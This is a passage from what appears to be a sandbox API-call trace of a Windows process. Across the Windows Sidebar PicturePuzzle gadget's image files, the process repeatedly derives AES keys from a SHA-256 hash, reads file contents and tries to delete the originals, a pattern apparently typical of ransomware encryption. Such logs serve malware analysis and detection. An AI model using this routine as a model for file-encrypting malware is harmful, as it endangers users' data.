CryptDestroyHash (hHash=0x284d528) returned 1 [0189.740] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.740] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.741] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png")) returned 0 [0189.742] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.742] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.742] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.742] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.742] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa5 [0189.742] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.744] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.744] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.744] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.745] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png")) returned 0 [0190.824] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.825] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.825] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.825] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.825] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6 [0190.825] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.826] CryptDestroyHash (hHash=0x284d528) returned 1 [0190.826] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.826] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.828] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png")) returned 0 [0190.943] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.944] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.944] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.944] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.944] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8 [0190.944] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.945] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0190.945] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.945] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.947] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_right.png")) returned 0 [0190.947] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.948] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.948] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.948] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.948] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x83 [0190.948] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.949] CryptDestroyHash (hHash=0x284d528) returned 1 [0190.949] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.949] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.950] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png")) returned 0 [0190.951] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.951] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.951] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.951] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.951] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x91 [0190.951] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.953] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0190.953] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.953] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.955] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png")) returned 0 [0190.955] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.956] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.956] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.956] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.956] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8b [0190.956] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.957] CryptDestroyHash (hHash=0x284d528) returned 1 [0190.957] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.958] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.959] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png")) returned 0 [0190.959] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.960] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.960] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.960] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.960] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b9 [0190.960] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0190.975] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0190.975] CryptDestroyKey (hKey=0x284d568) returned 1 [0190.975] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0190.977] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_disabled.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_disabled.png")) returned 0 [0190.978] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0190.978] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0190.979] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.979] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0190.979] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41a [0190.979] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.017] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.017] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.017] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.019] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png")) returned 0 [0191.019] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.020] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.020] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.020] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.020] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x464 [0191.020] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.022] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.022] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.022] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.024] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png")) returned 0 [0191.024] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.025] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.025] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.025] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.025] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x357 [0191.025] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.027] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.027] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.027] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.028] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png")) returned 0 [0191.029] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.030] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.030] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.030] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.030] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b9 [0191.030] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.032] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.032] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.032] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.034] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png")) returned 0 [0191.034] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.035] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.035] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.035] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.035] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x417 [0191.035] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.038] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.038] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.038] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.040] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png")) returned 0 [0191.041] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.041] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.041] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.041] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.041] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x45f [0191.041] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.043] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.043] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.043] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.045] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png")) returned 0 [0191.045] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.046] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.046] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.046] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.046] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x358 [0191.046] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.060] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.060] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.060] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.061] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png")) returned 0 [0191.062] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.062] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.062] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.062] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.062] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4af [0191.063] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.066] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.066] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.066] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.067] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png")) returned 0 [0191.069] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.069] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.069] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.069] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.069] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd8f [0191.070] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.071] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.071] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.072] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.073] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png")) returned 0 [0191.073] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.074] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.074] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.074] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.074] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd33 [0191.074] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.077] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.077] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.077] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.078] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png")) returned 0 [0191.079] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.080] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.080] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.080] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.080] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd5d [0191.080] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.106] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.106] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.106] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.107] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png")) returned 0 [0191.108] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft 